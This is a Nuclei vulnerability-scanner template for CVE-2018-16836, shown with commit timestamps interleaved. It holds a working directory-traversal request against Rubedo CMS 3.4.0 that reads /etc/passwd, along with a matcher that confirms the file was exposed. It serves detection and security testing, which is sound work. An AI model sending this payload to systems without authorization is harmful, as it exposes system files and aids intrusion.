nuclei-templates/cves/2018/CVE-2018-16836.yaml

24 lines
554 B
YAML
Raw Normal View History

2021-09-21 10:50:24 +00:00
id: CVE-2018-16836
2021-06-10 10:08:37 +00:00
info:
name: Rubedo CMS 3.4.0 - Directory Traversal
author: 0x_Akoko
severity: high
reference: https://www.exploit-db.com/exploits/45385
2021-09-21 10:47:16 +00:00
tags: cve,cve2018,rubedo,lfi
2021-06-10 10:08:37 +00:00
requests:
- method: GET
path:
- "{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
2021-07-24 21:35:55 +00:00
- "root:.*:0:0"
2021-06-10 10:08:37 +00:00
- type: status
status:
- 200